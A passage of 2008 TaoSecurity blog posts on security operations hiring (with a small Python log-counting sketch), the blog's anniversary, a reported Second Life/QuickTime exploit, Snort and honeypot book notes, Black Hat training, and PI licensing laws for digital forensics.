Am I setting the bar too high? Are there some magic keywords in the job req that I'm missing? Am I going to have hire juniors and train them up? Is there even such a thing as a senior operations analyst?


My initial response is that the number of people who can independently and competently answer these questions is remarkably small. Furthermore, the number of shops that are collecting the data necessary to answer these questions is also small.
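
To be concrete about "the data necessary": question 1's one-off-versus-pattern check, for example, is a single pass over session records. The sketch below assumes a CSV export of session data with hypothetical column and file names; substitute whatever your NSM or SEM stack actually produces.

    import csv
    from collections import Counter

    SUSPECT = "198.51.100.7"   # hypothetical source address from the alert

    hits = Counter()
    with open("sessions.csv", newline="") as f:   # placeholder session-data export
        for row in csv.DictReader(f):             # assumed columns named below
            if row["src_ip"] == SUSPECT:
                # Bucket by day and destination: one-off or campaign?
                hits[(row["timestamp"][:10], row["dst_ip"])] += 1

    for (day, dst_ip), count in sorted(hits.items()):
        print(day, dst_ip, count)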

What do blog readers think?

Monday, 7 January 2008

Happy 5th Birthday TaoSecurity Blog

Today, 8 January 2008, is the fifth birthday of TaoSecurity Blog. I wrote my first post on 8 January 2003 while working as an incident response consultant for Foundstone. 2087 posts (averaging 417 per year!?!) later, I am still blogging.

My pace has slowed during the last few months, mainly because I have been spending more time reading in my off hours. I have also found fewer really gripping security events to report. I try not to jump on the bandwagon, so if you see a lot of coverage of a certain event I will probably not report it. I might chime in if there's an uncovered angle or I particularly want to record my thoughts on the issue.

I plan to continue blogging, especially with respect to network security monitoring, incident detection and response, network forensics, and FreeBSD when appropriate. I especially enjoy reading your comments and engaging in informed dialogues. Thanks for joining me these five years -- I hope to have a ten year post in 2013!

Don't forget -- today is Elvis Presley's birthday. Coincidence? You decide.

The image shows Elvis training with Ed Parker, founder of American Kenpo. As I like to tell my students, Elvis' stance is so wide it would take him a week to react to an attack. Then again, he's Elvis.

I studied Kenpo in San Antonio, TX and would like to return to practicing if my shoulder cooperates!

Sussy McBride Shouts: I got hacked

Thanks to Sensepost for reporting this story last month. They describe an advisory published by Charles Miller and Dino Dai Zovi whereby arbitrary characters in Second Life are digitally mindjacked and robbed. By walking on "land" owned by an attacker, with Second Life configured to automatically display video, a victim's avatar and computer can be exploited via the November 2007 QuickTime vulnerability. In the YouTube video you can see "Sussy McBride" freeze, shout "I got hacked," and give her money to the attacker.

I am fascinated by this story because it is the natural progression from a 2006 post Security, A Human Problem describing a Second Life denial of service attack. In that post I said:

First, it demonstrates that client-side attacks remain a human problem and less of a technical problem. Second, I expect at some point these virtual worlds will need security consultants, just like the physical world. I wonder if someone could write a countermeasure at the individual player level for these sorts of attacks?

I wonder if anyone in Second Life will start creating disposable bodyguard avatars to walk in front of highly-valued avatars, thereby acting as "digital mine detectors?"

Review of Virtual Honeypots Posted

Amazon.com just posted my five star review of Virtual Honeypots by Niels Provos and Thorsten Holz. From the review:

It's fairly difficult to find good books on digital defense. Breaking and entering seems to be more exciting than protecting victims. Thankfully, Niels Provos and Thorsten Holz show that defense can be interesting and innovative too. Their book Virtual Honeypots is your ticket for deploying defensive resources that will provide greater digital situational awareness.

Snort Report 12 Posted

My 12th Snort Report titled Snort Frequently Asked Questions is posted. From the start of the article:

Service provider takeaway: Snort isn't perfect. In this tip, service providers will learn the answers to frequently asked questions about Snort's usage and limitations.

In this edition of the Snort Report, I address some of the questions frequently asked by service providers who are users or potential users of Snort. I say "potential users" because some people hear about Snort and wonder if it can solve a particular problem. Here I hope to provide realistic expectations for service providers using Snort.


Again, please note I did not write the words "Snort isn't perfect." The editor did. This is one of the aspects of the Snort Report I do not control. In this article I address these questions.

  1. Can I use Snort to protect a network from denial-of-service attacks?

  2. Can Snort decode encrypted traffic?

  3. Can Snort detect layer 2 attacks?

  4. Can Snort log flows or sessions?

  5. Can Snort rebuild content from traffic?


If you like this article and have your own Snort questions, please post them here as comments. Thank you.

Bejtlich Interviews

Taking a look at posts from the last year, I realized I forgot to mention a few events. First, Kai Roer wrote a security profile of me using a question-and-answer format. Second, Chris Byrd posted an interview with me that covers different ground. Finally, TechTarget and Addison-Wesley asked me to read a portion of my book Extrusion Detection, specifically the beginning of chapter 2. It is listed as the February 5, 2007 feature in their 2007 podcast archive. Thank you to Kai, Chris, and TechTarget/AW for these resources.

Sunday, 6 January 2008

No More Tiger Team?

You may have already heard about Tiger Team on the former Court TV (now TruTV), but I finally watched both episodes this weekend on my TiVo. I liked the "WWJD40D", "Core Impact", and "I am an Infosec Sellout" T-shirts. I especially liked the injection of time-based security into the jewelry heist scenario, where the tiger team was slowed by 15 minutes because they tried brute-forcing a keypad lock.

I contacted several PR reps at TruTV and asked about Tiger Team's future. One of them wrote back:

Thank you for your email and interest in Tiger Team.

Tiger Team was a special and likely won't be returning.

Please let me know if I can assist you with anything else.


That is a real shame -- I hope TruTV reconsiders.

Thursday, 3 January 2008

Reminder: Bejtlich Teaching at Black Hat DC 2008 Training

I just wanted to remind interested readers that Black Hat was kind enough to invite me back to teach TCP/IP Weapons School at Black Hat DC 2008 on 18-19 February 2008, at the Westin Washington DC City Center. This is currently my only scheduled training class in 2008. As you can see from the course description I will focus on OSI model layers 2-5 and add material on network security operations, like monitoring, incident response, and forensics. The cost for this single two-day class is now $2200 until 8 February, when online registration closes and the price increases. Register while seats are still available -- both of my sessions in Las Vegas sold out. Thank you.

Private Eyes Again

In May 2006 I wrote Avoid Incident Response and Forensics Work in These States after reading a great article by Mark Rasch about states requiring some digital forensics consultants to have private investigator licenses. One of my colleagues pointed me to a new article by Deb Radcliff: http://www.baselinemag.com/article2/0,1540,2242720,00.asp . From the article:

Under pending legislation in South Carolina, digital forensic evidence gathered for use in a court in that state must be collected by a person with a PI license or through a PI licensed agency...

Otherwise, digital evidence collected by unlicensed practitioners could be excluded from criminal and civil court cases. Worse yet, those caught practicing without a license could face criminal prosecution...

South Carolina isn't alone in considering regulating digital forensics and restricting the practice to licensed PIs. Georgia, New York, Nevada, North Carolina, Texas, Virginia and Washington are some of the states going after digital forensic experts operating in their states without a PI license...

All but six states have PI licensing laws on the books, according to Jimmie Mesis, publisher of PI Magazine, 32 of which could be interpreted to include digital forensic investigators. While their languages differ, these licensing laws essentially consider a PI to be anybody engaging in the business of securing evidence to be used in criminal or civil proceedings...


Sounds scary so far. I take comfort in the following:

Computer forensics is more often used as an internal investigatory tool. In other words, probes and evidence collected inside the firewall stay inside the firewall. In these cases, none of the proposed or existing state laws requiring PI licenses apply. That is, until the case spills outside the enterprise domain—to a partner network or an Internet service provider, for instance.

At this point, most organizations should be turning investigations over to law enforcement or licensed PI agencies anyway, [Steve] Abrams [a licensed independent PI and computer forensic examiner based in Sullivans Island, S.C.] says. Maybe so, but history doesn't support Abrams' perspective, and IT experts and forensic consultants say most enterprises would rather keep their investigations quiet than risk public disclosure by going to law enforcement.


So those of us who perform forensics for our employers should be safe. Consultants, on the other hand...

At greater risk of exposure, however, are security and network management service providers, which often conduct investigations on behalf of their clients. In this case, they would be considered PI firms and need licensing in a majority of states, confirm Abrams and others.

Beyond a PI license, there's also certification to contend with:

States are looking to the failed Nevada legislation as a model for defining these qualifications. The attempted revision to the proposed statute defined a digital forensic professional as "a person who engages in the business of, or accepts employment using, specialized computer techniques for the recovery or analysis of digital information from any computer or digital storage device, with the intent to preserve evidence, and who as a part of his business provides reports or testimony in regards to that information."

Nevada's [failed] qualification guidelines include 18 months' experience, a Bachelor's degree in computer forensics, and a Certified Computer Examiner (CCE) credential or its successor equivalent. South Carolina won't have a requirement for any particular degree, but will require minimal training, CCE certification and annual continuing education to remain licensed, according to Abrams.

At present, the CCE is the most recognized forensic certification available to the private sector and the only one open to the private sector being considered in state PI licensing laws.


I never heard of the CCE until today. Getting the cert sounds easy:

The initial CCE process consists of a proctored online multiple choice question and answer examination, the forensic examination of a floppy diskette, the forensic examination of a CDR disk, and the forensic examination of an image of a hard disk drive. An 80% or better average score is required to complete the process...

The primary purpose of this certification is to measure if the applicant understands and uses sound evidence handling and storage procedures and follows sound forensic examinations procedures when conducting examinations...

[M]ost of the grade is based upon following sound evidence handling and storage procedures and following sound examination procedures, not simply recovering the data. An 80% total average score will be required to obtain the Certified Computer Examiner(CCE) ® certification. Do not assume that we know your standard operating procedures. Your grade will be based solely upon what you have written in your reports and the exhibits that you provide.

The fee for taking the entire process is $395.


We had some good commentary in May 2006. Does anyone have any comments on this update?